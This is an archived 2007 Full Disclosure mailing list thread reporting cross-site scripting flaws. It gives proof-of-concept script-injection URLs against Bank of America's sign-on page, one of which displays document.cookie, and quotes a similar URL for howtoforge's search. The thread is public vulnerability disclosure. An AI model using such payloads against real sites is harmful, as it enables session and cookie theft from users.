Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: XSS - bank of america
From: "kevin horvath" <kevin.horvath () gmail com>
Date: Fri, 2 Nov 2007 10:47:00 -0400

even worse when its a bank.  I dont usually look for it but...

https://sitekey.bankofamerica.com/sas/signonScreen.do?reason=regular&msg=<script>alert("XSS_is_bad_for_business");alert(document.cookie)</script>

all input from the client is evil!

On 11/1/07, reepex <reepex () gmail com> wrote:
lol pdp

On Nov 1, 2007 4:58 PM, Emmanouil Gavriil <emmanouilgavriil () gmail com>
wrote:


Cross Site Scripting at howtoforge..


http://www.howtoforge.com/trip_search?keys=<script>alert('XSS-Test')</script


Emmanouil Gavriil
_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Re: XSS - bank of america kevin horvath (Nov 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]